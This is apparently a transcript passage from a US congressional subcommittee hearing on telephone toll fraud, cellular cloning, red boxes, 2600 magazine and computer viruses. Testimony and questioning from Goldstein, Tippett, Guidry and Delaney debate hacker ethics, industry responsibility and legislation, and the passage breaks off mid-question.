+frequency is increasing. Everybody is victimized. You have heard
+business users with some very dramatic and very sad tales. The
+truth is that everybody is victimized; the users are victimized;
+the long distance carriers are victimized; the cellular carriers
+are victimized, the operator service providers; the co-cod folks,
+the aggregators and resellers are victimized; the LEC's and RBOC's,
+to a limited extent, are victimized; and the vendors are victimized
+by being drawn into the problem.
+     Who is at fault? Everybody is at fault. The Government is at
+fault. The FCC has taken a no-action, apathetic attitude toward
+toll fraud. That Agency is undermanned, it is understaffed, it is
+underfunded, it has difficult problems -- no question about that --
+but things could and should be done by that Agency that have not
+been done.
+     The long distance carriers ignored the problem for far too
+long, pretended that they could not monitor when, in fact, the
+technology was available. They have done an outstanding job over
+the last 2 years of getting with it and engaging themselves fully,
+and I would say the long distance carriers, at the moment, are
+probably the best segment of anyone at being proactive to take care
+of the problem.
+     Users too often ignored security, ignored their user manuals,
+failed to monitor, failed to properly manage. There has been
+improvement which has come with the public knowledge of the
+problem. CPE venders, those folks who manufactured the systems that
+are so easy to penetrate, have done an abysmally poor job of
+engineering into the systems security features. They have ignored
+security. Their manuals didn't deal with security. They are
+starting to now. They are doing a far better job. More needs to be
+done.
+     The FCC, in particular, needs to become active. This committee
+needs to focus more attention on the problem, jawbone, keep the
+heat on the industry, the LEC's and the RBOC's in particular. The
+LEC's and the RBOC's have essentially ignored the problem. They are
+outside the loop, they say, yet the LEC's and the RBOC's collected
+over $21 billion last year in access fees for connecting their
+users to the long distance networks. How much of that $21 billion
+did the LEC's and the RBOC's reinvest in helping to protect their
+users from becoming victimized and helping to combat user-targeted
+toll fraud? No more than $10 million, one-fifth of 1 percent.
+     Many people in the industry feel the LEC's and the RBOC's are
+the one large group that has yet to seriously come to the table.
+Many in the industry -- and we happen to agree -- feel that 3 to 4
+percent of those access fees should be reinvested in protecting
+users from being targeted by the toll fraud criminals.
+     The FCC should become more active. The jawboning there is at
+a minimal level. There was one show hearing last October, lots of
+promises, no action, no regulation, no initiatives, no meetings. A
+lot could be done. Under part 68, for example, the FCC, which is
+supposed to give clearance to any equipment before it is connected
+into the network, they could require security features embedded
+within that equipment. They could prevent things like low-end PBX's
+from being sold with three-digit barrier codes that anyone can
+penetrate in 3 to 5 minutes.
+     Thank you, Mr. Chairman.
+     Mr. MARKEY. THANK YOU, MR. HAUGH, VERY MUCH.
+     Mr. Goldstein, let's go to you next.
+     STATEMENT OF EMMANUEL GOLDSTEIN
+     Mr. GOLDSTEIN. Thank you, Mr. Chairman, and thank you to this
+committee for allowing me the opportunity to speak on behalf of
+those who, for whatever reason, have no voice.
+     I am in the kind of unique position of being in contact with
+those people known as computer hackers throughout the world, and I
+think one of the misconceptions that I would like to clear up, that
+I have been trying to clear up, is that hackers are analogous to
+criminals. This is not the case. I have known hundreds of hackers
+over the years, and a very, very small percentage of them are
+interested in any way in committing any kind of a crime. I think
+the common bond that we all have is curiosity, an intense form of
+curiosity, something that in many cases exceeds the limitations
+that many of us would like to put on curiosity. The thing is
+though, you cannot really put a limitation on curiosity, and that
+is something that I hope we will be able to understand.
+     I like to parallel the hacker culture with any kind of alien
+culture because, as with any alien culture, we have difficulty
+understanding its system of values, we have difficulty
+understanding what it is that motivates these people, and I hope to
+be able to demonstrate through my testimony that hackers are
+friendly people, they are curious people, they are not out to rip
+people off or to invade people's privacy; actually, they are out to
+protect those things because they realize how valuable and how
+precious they really are.
+     I like to draw analogies to where we are heading in the world
+of high technology, and one of the analogies I have come up with is
+to imagine yourself speeding down a highway, a highway that is
+slowly becoming rather icy and slippery, and ask yourself the
+question of whether or not you would prefer to be driving your own
+car or to be somewhere inside a large bus, and I think that is kind
+of the question we have to ask ourselves now. Do we want to be in
+control of our own destiny as far as technology goes, or do we want
+to put all of our faith in somebody that we don't even know and
+maybe fall asleep for a little while ourselves and see where we
+wind up? It is a different answer for every person, but I think we
+need to be able to at least have the opportunity to choose which it
+is that we want to do.
+     Currently, there is a great deal of suspicion, a great deal of
+resignation, hostility, on behalf of not simply hackers but
+everyday people on the street. They see technology as something
+that they don't have any say in, and that is why I particularly am
+happy that this committee is holding this hearing, because people,
+for the most part, see things happening around them, and they
+wonder how it got to that stage. They wonder how credit files were
+opened on them; they wonder how their phone numbers are being
+passed on through A&I and caller ID. Nobody ever went to these
+people and said, "Do you want to do this? Do you want to change the
+rules?"
+     The thing that hackers have learned is that any form of
+technology can and will be abused, whether it be calling card
+numbers or the Clipper chip. At some point, something will be
+abused, and that is why it is important for people to have a sense
+of what it is that they are dealing with and a say in the future.
+     I think it is also important to avoid inequities in access to
+technology, to create a society of haves and have-nots, which I
+feel we are very much in danger of doing to a greater extent than
+we have ever done before. A particular example of this involves
+telephone companies, pay phones to be specific. Those of us who can
+make a telephone call from, say, New York to Washington, D.C., at
+the cheapest possible rate from the comfort of our own homes will
+pay about 12 cents for the first minute. However, if you don't have
+a phone or if you don't have a home, you will be forced to pay
+$2.20 for that same first minute.
+     What this has led to is the proliferation of what are known as
+red boxes. I have a sample (indicating exhibit). Actually, this is
+tremendously bigger than it needs to be. A red box can be about a
+tenth of the size of this. But just to demonstrate the sound that
+it takes for the phone company to believe that you have put a
+quarter into the phone (brief tone is played), that is it, that is
+a quarter.
+     Now we can say this is the problem, this huge demonic device
+here is what is causing all the fraud, but it is not the case. This
+tape recorder here (same brief tone is played) does the same thing.
+So now we can say the tones are the problem, we can make tones
+illegal, but that is going to be very hard to enforce.
+     I think what we need to look at is the technology itself: Why
+are there gaping holes in them? and why are we creating a system
+where people have to rip things off in order to get the same access
+that other people can get for virtually nothing?
+     I think a parallel to that also exists in the case of cellular
+phones. I have a device here (indicating exhibit) which I won't
+demonstrate, because to do so would be to commit a Federal crime,
+but by pressing a button here within the course of 5 seconds we
+will be able to hear somebody's private, personal cellular phone
+call.
+     Now the way of dealing with privacy with cellular phone calls
+is to make a law saying that it is illegal to listen. That is the
+logic we have been given so far. I think a better idea would be to
+figure out a way to keep those cellular phone calls private and to
+allow people to exercise whatever forms of privacy they need to
+have on cellular phone calls.
+     So I think we need to have a better understanding both from
+the legislative point of view and in the general public as far as
+technology in itself, and I believe we are on the threshold of a
+very positive, enlightened period, and I see that particularly with
+things like the Internet which allow people access to millions of
+other people throughout the world at very low cost. I think it is
+the obligation of all of us to not stand in the way of this
+technology, to allow it to go forward and develop on its own, and
+to keep a watchful eye on how it develops but at the same time not
+prevent it through overlegislation or overpricing.
+     Thank you very much for the opportunity to speak.
+     Mr. MARKEY. Thank you, Mr. Goldstein.
+     Dr. Tippett.
+     STATEMENT OF PETER S. TIPPETT
+     Mr. TIPPET. Thank you.
+     I am Peter Tippett from Symantec Corporation, and today I am
+also representing the National Computer Security Association and
+the Computer Ethics Institute. Today is Computer Virus Awareness
+Day, in case you are not aware, and we can thank Jack Fields,
+Representative Fields, for sponsoring that day on behalf of the
+Congress, and I thank you for that.
+     We had a congressional briefing this morning in which nine
+representatives from industry, including telecommunications and
+aerospace and the manufacturing industry, convened, and for the
+first time were willing to talk about their computer virus problems
+in public. I have got to tell you that it is an interesting
+problem, this computer virus problem. It is a bit different from
+telephone fraud. The virus problem is one which has probably among
+the most misrepresentation and misunderstanding of these various
+kinds of fraud that are going on, and I would like to highlight
+that a little bit. But before I do, I would like to suggest what we
+know to be the costs of computer viruses just in America.
+     The data I am representing comes from IBM and DataQuest, a
+Dunn and Bradstreet company, it is the most conservative
+interpretation you could make from this data. It suggests that a
+company of only a thousand computers has a virus incident every
+quarter, that a typical Fortune 500 company deals with viruses
+every month, that the cost to a company with only a thousand
+computers is about $170,000 a year right now and a quarter of a
+million dollars next year. If we add these costs up, we know that
+the cost to United States citizens of computer viruses just so far,
+just since 1990, exceeds $1 billion.
+     When I go through these sorts of numbers, most of us say,
+well, that hype again, because the way the press and the way we
+have heard about computer viruses has been through hype oriented
+teachings. So the purpose here is not to use hype and not to sort
+of be alarmist and say the world is ending, because the world isn't
+ending per se, but to suggest that there isn't a Fortune 500
+company in the United States who hasn't had a computer virus
+problem is absolutely true, and the sad truth about these viruses
+is that the misconceptions are keeping us from doing the right
+things to solve the problem, and the misconceptions stem from the
+fact that companies that are hit by computer viruses, which is
+every company, refused to talk about that until today.
+     There are a couple of other unique things and misconceptions
+about computer viruses. One is that bulletin boards are the leading
+source of computer viruses. Bulletin boards represent the infancy
+of the superhighway, I think you could say, and there are a lot of
+companies that make rules in their company that you are not allowed
+to use bulletin boards because you might get a virus. In fact, it
+is way in the low, single-digit percents. It may be as low as 1
+percent of computer viruses that are introduced into companies come
+through some route via a bulletin board.
+     We are told that some viruses are benign, and, in fact, most
+people who write computer viruses think that their particular virus
+is innocuous and not harmful. It turns out that most virus authors,
+as we just heard from Mr. Goldstein, are, in fact, curious people
+and not malicious people. They are young, and they are challenged,
+and there is a huge game going on in the world. There is a group of
+underground virus bulletin boards that we call virus exchange
+bulletin boards in which people are challenged to write viruses.
+     The challenge works like this: If you are interested and
+curious, you read the threads of communication on these bulletin
+boards, and they say, you know, "If you want to download some
+viruses, there's a thousand here on the bulletin board free for
+your downloading," but you need points. Well, how do you get
+points? Well, you upload some viruses. Well, where do you get some
+viruses from? If you upload the most common viruses, they are not
+worth many points, so you have to upload some really good, juicy
+viruses. Well, the only way to get those is to write them, so you
+write a virus and upload your virus, and then you gain acceptance
+into the culture, and when you gain acceptance into the culture you
+have just added to the problem.
+     It is interesting to know that the billion dollars that we
+have spent since 1990 on computer viruses just in the United States
+is due to viruses that were written in 1988 and 1987. Back then, we
+only had one or two viruses a quarter, new, introduced into the
+world. This year we have a thousand new computer viruses introduced
+into our community, and it won't be for another 4 or 5 years before
+these thousand viruses that are written now will become the major
+viruses that hurt us in the future.
+     So virus authors don't believe they are doing anything wrong,
+they don't believe that they are being harmful, and they don't
+believe that what they do is dangerous, and, in fact, all viruses
+are.
+     Computer crime laws don't have anything to do with computer
+virus writers, so we heard testimony this morning from Scott
+Charney of the Department of Justice who suggested that authorized
+access is the biggest law you could use, and, in fact, most viruses
+are brought into our organizations in authorized ways, because
+users who are legitimate in the organizations accidentally bring
+these things in, and then they infect our companies.
+     In summary, I think that we need to add a little bit of
+specific wording in our computer crime legislation that relates
+particularly to computer viruses and worms. We need, in particular,
+to educate. We need to go after an ethics angle. We need to get to
+the point where Americans think that writing viruses or doing these
+other kinds of things that contaminate our computer superhighways
+are akin to contaminating our expressways.
+     In the sixties we had a big "Keep America Beautiful" campaign,
+and most Americans would find it unthinkable to throw their garbage
+out the window of their car, but we don't think it unthinkable to
+write rogue programs that will spread around our highway.
+     Thank you.
+     Mr. MARKEY. Thank you, Dr. Tippett.
+     Mr. Guidry.
+     STATEMENT OF MICHAEL A. GUIDRY
+     Mr. GUIDRY. Thank you, Mr. Chairman, for giving me the
+opportunity to appear before this subcommittee, and thank you,
+subcommittee, for giving me this opportunity.
+     The Guidry Group is a Houston-based security consulting firm
+specializing in telecommunication issues. We started working in
+telecommunication issues in 1987 and started working specifically
+with the cellular industry at that time. When we first started, we
+were working with the individual carriers across the United States,
+looking at the hot points where fraud was starting to occur, which
+were major metropolitan cities of course.
+     In 1991, the Cellular Telephone Industry Association contacted
+us and asked us to work directly with them in their fight against
+cellular fraud. The industry itself has grown, as we all know,
+quite rapidly. However, fraud in the industry has grown at an
+unbelievable increase, actually faster than the industry itself,
+and as a result of that fraud now is kind of like a balloon, a
+water balloon; it appears in one area, and when we try to stamp it
+out it appears in another area.
+     As a result, what has happened is, when fraud first started,
+there was such a thing as subscription fraud, the same type of
+fraud that occurred with the land line telecommunication industry.
+That subscription fraud quickly changed. Now what has occurred is,
+technology has really stepped in.
+     First, hackers, who are criminals or just curious people,
+would take a telephone apart, a cellular phone apart, and change
+the algorithm on the chip, reinsert the chip into the telephone,
+and cause that telephone to tumble. Well, the industry put its best
+foot forward and actually stopped, for the most part, the act of
+tumbling in cellular telephones. But within the last 18 months
+something really terrible has happened, and that is cloning.
+     Cloning is the copying of the MIN and and ESN number, and, for
+clarification, the MIN is the Mobile Identification Number that is
+assigned to you by the carrier, and the ESN number is the
+Electronic Cellular Number that is given to the cellular telephone
+from that particular manufacturer. As a result, now we have
+perpetrators, or just curious people, finding ways to copy the MIN
+and the ESN, thereby victimizing the cellular carrier as well as
+the good user, paying subscriber. This occurs when the bill is
+transmitted by the carrier to the subscriber and he says something
+to the effect of, "I didn't realize that I had made $10,000 worth
+of calls to the Dominican Republic," or to Asia or Nicaragua or
+just any place like that.
+     Now what has happened is, those clone devices have been placed
+in the hands of people that we call ET houses, I guess you would
+say, and they are the new immigrants that come into the United
+States for the most part that do not have telephone subscriptions
+on the land line or on the carrier side from cellular, and now they
+are charged as much as $25 for 15 minutes to place a call to their
+home.
+     Unfortunately, though, the illicit behavior of criminals has
+stepped into this network also. Now we have gang members, drug
+dealers, and gambling, prostitution, vice, just all sorts of crime,
+stepping forward to use this system where, by using the cloning,
+they are avoiding law enforcement. Law enforcement has problems, of
+course, trying to find out how to tap into those telephone systems
+and record those individuals.
+     Very recently, cloning has even taken a second step, and that
+is now something that we term the magic phone, and the magic phone
+works like this: Instead of cloning just one particular number, it
+clones a variety of numbers, as many as 14 or 66, thereby
+distributing the fraud among several users, which makes it almost
+virtually impossible for us to detect at an early stage.
+     In response to this, what has happened? A lot of legitimate
+people have started to look at using the illegitimate cellular
+services. They are promised that this is a satellite phone or just
+a telephone that if they pay a $2,500 fee will avoid paying further
+bills. So now it has really started to spread.
+     Some people in major metropolitan areas, such as the
+Southwest, Northeast, and Southeast, have started running their own
+mini-cellular companies by distributing these cloning phones to
+possible clients and users, collecting the fee once a month to
+reactivate the phone if it is actually denied access.
+     The cellular industry has really stepped up to the plate I
+think the best they can right now in trying to combat this by
+working with the switch manufacturers and other carriers, 150 of
+them to date with the cellular telephone industry, as well as the
+phone manufacturers, and a lot of companies have started looking at
+software technology. However, these answers will not come to pass
+very soon. What we must have is strong legislation.
+     We have been working for the last 18 months, specifically with
+the Secret Service and a lot of local, State, and Federal law
+enforcement agencies. The Service has arrested over 100 people
+involved in cellular fraud. We feel very successful about that. We
+also worked with local law enforcement in Los Angeles to form the
+L.A. Blitz, and we arrested an additional 26 people and seized 66
+illegal telephones and several computers that spread this cloning
+device.
+     However, now we have a problem. U.S. Title 18, 1029, does not
+necessarily state cellular or wireless. It is very important, and
+I pray that this committee will look at revising 1029 and changing
+it to include wireless and cellular. I think wireless
+communications, of course, like most people, is the wave of the
+future, and it is extremely important that we include that in the
+legislation so that when people are apprehended they can be
+prosecuted.
+     Thank you, sir.
+     Mr. MARKEY. Thank you, Mr. Guidry, very much.
+     We will take questions now from the subcommittee members.
+     Let me begin, Mr. Delaney. I would like you and Mr. Goldstein
+to engage in a conversation, if we could. This is Mr. Goldstein's
+magazine, "The Hacker Quarterly: 2600," and for $4 we could go out
+to Tower Records here in the District of Columbia and purchase
+this. It has information in it that, from my perspective, is very
+troubling in terms of people's cellular phone numbers and
+information on how to crack through into people's private
+information.
+     Now you have got some problems with "The Hacker Quarterly,"
+Mr. Delaney.
+     Mr. DELANEY. Yes, sir.
+     Mr. MARKEY. And your problem is, among other things, that
+teenagers can get access to this and go joy riding into people's
+private records.
+     Mr. DELANEY. Yes, sir. In fact, they do.
+     Mr. MARKEY. Could you elaborate on what that problem is?
+     And then, Mr. Goldstein, I would like for you to deal with the
+ethical implications of the problem as Mr. Delaney would outline
+them.
+     Mr. DELANEY. Well, the problem is that teenagers do read the
+"2600" magazine. I have witnessed teenagers being given free copies
+of the magazine by the editor-in-chief. I have looked at a
+historical perspective of the articles published in "2600" on how
+to engage in different types of telecommunications fraud, and I
+have arrested teenagers that have read that magazine.
+     The publisher, or the editor-in-chief, does so with impunity
+under the cloak of protection of the First Amendment. However, as
+I indicated earlier, in that the First Amendment has been abridged
+for the protection of juveniles from pornography, I also feel that
+it could be abridged for juveniles being protected from manuals on
+how to commit crime -- children, especially teenagers, who are
+hackers, and who, whether they be mischievous or intentionally
+reckless, don't have the wherewithal that an adult does to
+understand the impact of what he is doing when he gets involved in
+this and ends up being arrested for it.
+     Mr. MARKEY. Mr. Goldstein, how do we deal with this problem?
+     Mr. GOLDSTEIN. First of all, "2600" is not a manual for
+computer crime. What we do is, we explain how computers work. Very
+often knowledge can lead to people committing crimes, we don't deny
+that, but I don't believe that is an excuse for withholding the
+knowledge.
+     The article on cellular phones that was printed in that
+particular issue pretty much goes into detail as to how people can
+track a cellular phone call, how people can listen in, how exactly
+the technology works. These are all things that people should know,
+and perhaps if people had known this at the beginning they would
+have seen the security problems that are now prevalent, and perhaps
+something could have been done about it at that point.
+     Mr. MARKEY. Well, I don't know. You are being a little bit
+disingenuous here, Mr. Goldstein. Here, on page 17 of your spring
+edition of 1993, "How to build a pay TV descrambler." Now that is
+illegal.
+     Mr. GOLDSTEIN. Not building. Building one is not illegal.
+     Mr. MARKEY. Oh, using one is illegal?
+     Mr. GOLDSTEIN. Exactly.
+     Mr. MARKEY. I see. So showing a teenager, or anyone, how to
+build a pay TV descrambler is not illegal. But what would they do
+then, use it as an example of their technological prowess that they
+know how to build one? Would there not be a temptation to use it,
+Mr. Goldstein?
+     Mr. GOLDSTEIN. It is a two-way street, because we have been
+derided by hackers for printing that information and showing the
+cable companies exactly what the hackers are doing.
+     Mr. MARKEY. I appreciate it from that perspective, but let's
+go over to the other one. If I am down in my basement building a
+pay TV descrambler for a week, am I not going to be tempted to see
+if it works, Mr. Goldstein? Or how is it that I then prove to
+myself and my friends that I have actually got something here which
+does work in the real world?
+     Mr. GOLDSTEIN. It is quite possible you will be tempted to try
+it out. We don't recommend people being fraudulent --
+     Mr. MARKEY. How do you know that it works, by the way?
+     Mr. GOLDSTEIN. Actually, I have been told by most people that
+is an old version that most cable companies have gotten beyond.
+     Mr. MARKEY. So this wouldn't work then?
+     Mr. GOLDSTEIN. It will work in some places, it won't work in
+all places.
+     Mr. MARKEY. Oh, it would work? It would work in some places?
+     Mr. GOLDSTEIN. Most likely, yes. But the thing is, we don't
+believe that because something could be used in a bad way, that is
+a reason to stifle the knowledge that goes into it.
+     Mr. MARKEY. That is the only way this could be used. Is there
+a good way in which a pay TV descrambler could be used that is a
+legal way?
+     Mr. GOLDSTEIN. Certainly, to understand how the technology
+works in the first place, to design a way of defeating such devices
+in the future or to build other electronic devices based on that
+technology.
+     Mr. MARKEY. I appreciate that, but it doesn't seem to me that
+most of the subscribers to "2600" magazine --
+     Mr. GOLDSTEIN. That is interesting that you are pointing to
+that. That is our first foray into cable TV. We have never even
+testified on the subject before.
+     Mr. MARKEY. I appreciate that.
+     Well, let's move on to some of your other forays here. What
+you have got here, it seems to me, is a manual where you go down
+Maple Street and you just kind of try the door on every home on
+Maple Street. Then you hit 216 Maple Street, and the door is open.
+What you then do is, you take that information, and you go down to
+the corner grocery store, and you post it: "The door of 216 Maple
+is open."
+     Now, of course, you are not telling anyone to steal, and you
+are not telling anyone that they should go into 216 Maple. You are
+assuming that everyone is going to be ethical who is going to use
+this information, that the house at 216 Maple is open. But the
+truth of the matter is, you have got no control at this point over
+who uses that information. Isn't that true, Mr. Goldstein?
+     Mr. GOLDSTEIN. The difference is that a hacker will never
+target an individual person as a house or a personal computer or
+something like that. What a hacker is interested in is wide open,
+huge data bases that contain information about people, such as TRW.
+     A better example, I feel, would be one that we tried to do 2
+years ago where we pointed out that the Simplex Lock Corporation
+had a very limited number of combinations on their hardware locks
+that they were trying to push homeowners to put on their homes, and
+we tried to alert everybody as to how insecure these are, how easy
+it is to get into them, and people were not interested.
+     Hackers are constantly trying to show people how easy it is to
+do certain things.
+     Mr. MARKEY. I appreciate what you are saying. From one
+perspective, you are saying that hackers are good people out there,
+almost like -- what are they called? -- the Angels that patrol the
+subways of New York City.
+     Mr. GOLDSTEIN. Guardian Angels. I wouldn't say that though.
+     Mr. MARKEY. Yes, the Guardian Angels, just trying to protect
+people.
+     But then Mr. Delaney here has the joy riders with the very
+same information they have taken off the grocery store bulletin
+board about the fact that 216 Maple is wide open, and he says we
+have got to have some laws on the books here to protect against it.
+     So would you mind if we passed, Mr. Goldstein, trespassing
+laws that if people did, in fact, go into 216 and did do something
+wrong, that we would be able to punish them legally? Would you have
+a problem with that?
+     Mr. GOLDSTEIN. I would be thrilled if computer trespassing
+laws were enforced to the same degree as physical trespassing laws,
+because then you would not have teenage kids having their doors
+kicked in by Federal marshals and being threatened with $250,000
+fines, having all their computer equipment taken and having guns
+pointed at them. You would have a warning, which is what you get
+for criminal trespass in the real world, and I think we need to
+balance out the real world --
+     Mr. MARKEY. All right. So you are saying, on the one hand, you
+have a problem that you feel that hackers are harassed by law
+enforcement officials and are unduly punished. We will put that on
+one side of the equation. But how about the other side? How about
+where hackers are violating people's privacy? What should we do
+there, Mr. Goldstein?
+     Mr. GOLDSTEIN. When a hacker is violating a law, they should
+be charged with violating a particular law, but that is not what I
+see today. I see law enforcement not having a full grasp of the
+technology. A good example of this was raids on people's houses a
+couple of years ago where in virtually every instance a Secret
+Service agent would say, "Your son is responsible for the AT&T
+crash on Martin Luther King Day," something that AT&T said from the
+beginning was not possible.
+     Mr. MARKEY. Again, Mr. Goldstein, I appreciate that. Let's go
+to the other side of the problem, the joy rider or the criminal
+that is using this information. What penalties would you suggest to
+deal with the bad hacker? Are there bad hackers?
+     Mr. GOLDSTEIN. There are a few bad hackers. I don't know any
+myself, but I'm sure there are.
+     Mr. MARKEY. I assume if you knew any, you would make sure we
+did something about them. But let's just assume there are bad
+people subscribing. What do we do about the bad hacker?
+     Mr. GOLDSTEIN. Well, I just would like to clarify something.
+We have heard here in testimony that there are gang members and
+drug members who are using this technology. Now, are we going to
+define them as hackers because they are using the technology?
+     Mr. MARKEY. Yes. Well, if you want to give them another name,
+fine. We will call them hackers and crackers, all right?
+     Mr. GOLDSTEIN. I think we should call them criminals.
+     Mr. MARKEY. So the crackers are bad hackers, all right? If you
+want another word for them, that is fine, but you have got the
+security of individuals decreasing with the sophistication of each
+one of these technologies, and the crackers are out there. What do
+we do with the crackers who buy your book?
+     Mr. GOLDSTEIN. I would not call them crackers. They are
+criminals. If they are out there doing something for their own
+benefit, selling information --
+     Mr. MARKEY. Criminal hackers. What do we do with them?
+     Mr. GOLDSTEIN. There are existing laws. Stealing is still
+stealing.
+     Mr. MARKEY. OK. Fine.
+     Dr. Tippett.
+     Mr. TIPPETT. I think that the information age has brought on
+an interesting dilemma that I alluded to earlier. The dilemma is
+that the people who use computers don't have parents who used
+computers, and therefore they didn't get the sandbox training on
+proper etiquette. They didn't learn you are not supposed to spit in
+other people's faces or contaminate the water that we drink, and we
+have a whole generation now of 100 million in the United States
+computer users, many of whom can think this through themselves,
+but, as we know, there is a range of people in any group, and we
+need to point out the obvious to some people. It may be the bottom
+10 percent.
+     Mr. MARKEY. What the problem is, of course, is that the
+computer hacker of today doesn't have a computer hacker parent, so
+parents aren't teaching their children how to use their computers
+because parents don't know how to use computers. So what do we do?
+     Mr. TIPPETT. It is incumbent upon us to do the same kind of
+thing we did in the sixties to explain that littering wasn't right.
+It is incumbent upon us to take an educational stance and for
+Congress to credit organizations, maybe through a tax credit or
+through tax deductions, for taking those educational opportunities
+and educating the world of people who didn't have sandbox training
+what is good and what is bad about computing.
+     So at least the educational part needs to get started, because
+I, for one, think that probably 90 percent of the kids -- most of
+the kids who do most of the damage that we have all described up
+here, in fact, don't really believe they are doing any damage and
+don't have the concept of the broadness of the problem that they
+are doing. The 10 percent of people who are criminal we could go
+after potentially from the criminal aspect, but the rest we need to
+get after from a plain, straight ahead educational aspect.
+     Mr. MARKEY. I appreciate that.
+     I will just say in conclusion -- and this is for your benefit,
+Mr. Goldstein. When you pass laws, you don't pass laws for the good
+people. What we assume is that there are a certain percent of
+people --  5 percent, 10 percent; you pick it -- who really don't
+have a good relationship with society as a whole, and every law
+that we pass, for the most part, deals with those people.
+     Now, as you can imagine, when we pass death penalty statutes,
+we are not aiming it at your mother and my mother. It is highly
+unlikely they are going to be committing a murder in this lifetime.
+But we do think there is a certain percentage that will. It is a
+pretty tough penalty to have, but we have to have some penalty that
+fits the crime.
+     Similarly here, we assume that there is a certain percentage
+of pathologically damaged people out there. The cerebral mechanism
+doesn't quite work in parallel with the rest of society. We have to
+pass laws to protect the rest of us against them. We will call them
+criminal hackers. What do we do to deal with them is the question
+that we are going to be confronted with in the course of our
+hearings?
+     Let me recognize the gentleman from Texas, Mr. Fields.
+     Mr. FIELDS. Thank you, Mr. Chairman.
+     Just for my own edification, Mr. Goldstein, you appear to be
+intelligent; you have your magazine, so obviously you are
+entrepreneurial. For me personally, I would like to know, why don't
+you channel the curiosity that you talk about into something that
+is positive for society? And, I'm going to have to say to you, I
+don't think it is positive when you invade someone else's privacy.
+     Mr. GOLDSTEIN. I agree.
+     Mr. FIELDS. Whether it is an individual or a corporation.
+     Mr. GOLDSTEIN. Well, I would like to ask a question in return
+then. If I discover that a corporation is keeping a file on me and
+I access that corporation's computer and find out or tell someone
+else, whose privacy am I invading? Or is the corporation invading
+my privacy?
+     You see, corporations are notorious for not volunteering such
+information: "By the way, we are keeping files on most Americans
+and keeping track of their eating habits and their sexual habits
+and all kinds of other things." Occasionally, hackers stumble on to
+information like that, and you are much more likely to get the
+truth out of them because they don't have any interest to protect.
+     Mr. FIELDS. Are you saying with this book that is what you are
+trying to promote? because when I look through this book, I find
+the same thing that the chairman finds, some things that could
+actually lead to criminal behavior, and when I see all of these
+codes regarding cellular telephones, how you penetrate and listen
+to someone's private conversation, I don't see where you are doing
+anything for the person, the person who is actually doing the
+hacking. I see that as an invasion of privacy.
+     Mr. GOLDSTEIN. All right. I need to explain something then.
+Those are not codes, those are frequencies. Those are frequencies
+that anybody can listen to, and by printing those frequencies we
+are demonstrating how easy it is for anybody to listen to them.
+     Now if I say that by tuning to 871 megahertz you can listen to
+a cellular phone call, I don't think I am committing a crime, I
+think I am explaining to somebody. What I have done at previous
+conferences is hold up this scanner and press a button and show
+people how easy it is to listen, and those people, when they get
+into their cars later on in the day, they do not use their cellular
+telephones to make private calls of a personal nature because they
+have learned something, and that is what we are trying to do, we
+are trying to show people how easy it is.
+     Now, yes, that information can be used in a bad way, but to
+use that as an excuse not to give out the information at all is
+even worse, and I think it is much more likely that things may be
+fixed, the cellular industry may finally get its act together and
+start protecting phone calls. The phone companies might make red
+boxes harder to use or might make it easier for people to afford
+phone calls, but we will never know if we don't make it public.
+     Mr. FIELDS. I want to be honest with you, Mr. Goldstein. I
+think it is frightening that someone like you thinks there is a
+protected right in invading someone else's privacy.
+     Mr. Guidry, let me turn to you. How does a hacker get the
+codes that you were talking about a moment ago -- if I understood
+what you were saying correctly, the manual ID number, the other
+cellular numbers that allow them to clone?
+     Mr. GUIDRY. Well, unfortunately, "2600" would be a real good
+bet to get those, and we have arrested people and found those
+manuals in their possession.
+     The other way is quite simply just to what we call dumpster
+dive, and that is to go to cellular carriers where they may destroy
+trash. Unfortunately, some of it is shredded and put back together,
+some of it is not shredded, and kids, criminals, go into those
+dumpsters, withdraw that information, piece it together, and then
+experiment with it. That information then is usually sold for
+criminal activity to avoid prosecution.
+     Mr. FIELDS. You are asking the subcommittee to include
+wireless and cellular, and I think that is a good recommendation.
+I think certainly that is one that we are going to take as good
+counsel. But it appears that much of what you are talking about is
+organized activity, and my question is, does the current punishment
+scheme actually fit the crime, or should we also look at increasing
+punishment for this type of crime?
+     Mr. GUIDRY. I would strongly suggest that we increase the
+punishment for this sort of crime. It is unfortunate that some
+hackers take that information and sell it for criminal activity,
+and, as a result, if prosecution is not stiff enough, then it far
+outweighs the crime.
+     Mr. FIELDS. What is the punishment now for this type of
+cellular fraud?
+     Mr. GUIDRY. Right now, it can be as high as $100,000 and up to
+20 years in the penitentiary.
+     Mr. FIELDS. Mr. Delaney, do you feel that that is adequate?
+     Mr. DELANEY. Under New York State law, which is what I deal
+with, as opposed to the Federal law, we can charge a host of
+felonies with regard to one illicit telephone call if you want to
+be creative with the law. Sections 1029 and 1039 really cover just
+about everything other than the cellular concern and the wireless
+concern.
+     However, I think the thing that is not dealt with is the
+person who is running the call sell operations. The call selling
+operations are the biggest loss of revenue to the telephone
+companies, cellular companies. Whether they are using PBX's or call
+diverters or cellular phones, this is where all the fraud is coming
+from, and there is only a handful of people who are originating
+this crime.
+     We have targeted these people in New York City right now, and
+the same thing is being done in Los Angeles and Florida, to
+determine who these people are that use just the telephone to hack
+out the codes on PBX's, use ESN readers made by the Curtis Company
+to steal the ESN and MIN's out of the air and then to disseminate
+this to the street phones and to the cellular phones that are in
+cars and deprive the cellular industry of about $300 million a
+year, and the rest of the telecommunications networks in the United
+States probably of about $1 billion a year, due to the call sell
+operations.
+     In one particular case that we watched, as a code was hacked
+out on a PBX in a company in Massachusetts, the code was
+disseminated to 250 street phones within the period of a week. By
+the end of the month, a rather small bill of $40,000 was sent to
+the company, small only because they were limited by the number of
+telephone lines going through that company. Had it been a larger
+company whose code had been cracked by the finger hacker, the bill
+would have been in the hundreds of thousands of dollars, or over $1
+million as typically some of the bills have been.
+     But this is a relatively small group of people creating a
+tremendous problem in the United States, and a law specifically
+dealing with a person who is operating as an entrepreneur, running
+a call selling operation, I think would go far to ending one of the
+biggest problems we have.
+     Mr. FIELDS. Let me ask so I understand, Mr. Delaney and Mr.
+Guidry, because I am a little confused, or maybe I just didn't
+understand the testimony, are these individual hackers acting
+separately, or are these people operating within a network, within
+an organization?
+     Mr. DELANEY. These finger hackers are the people that control
+the network of people that operate telephone booths and cellular
+phones for reselling telephone service. These finger hackers are
+not computer hackers.
+     Mr. FIELDS. When you say finger hackers, is this one person
+operating independently, or is that finger hacker operating in
+concert --
+     Mr. GUIDRY. No. He has franchised. He has franchised out. He
+actually sells the computer and the software and the cattail to do
+this to other people, and then they start their own little group.
+Now it is going internationally.
+     Mr. FIELDS. Explain to me, if the chairman would permit --
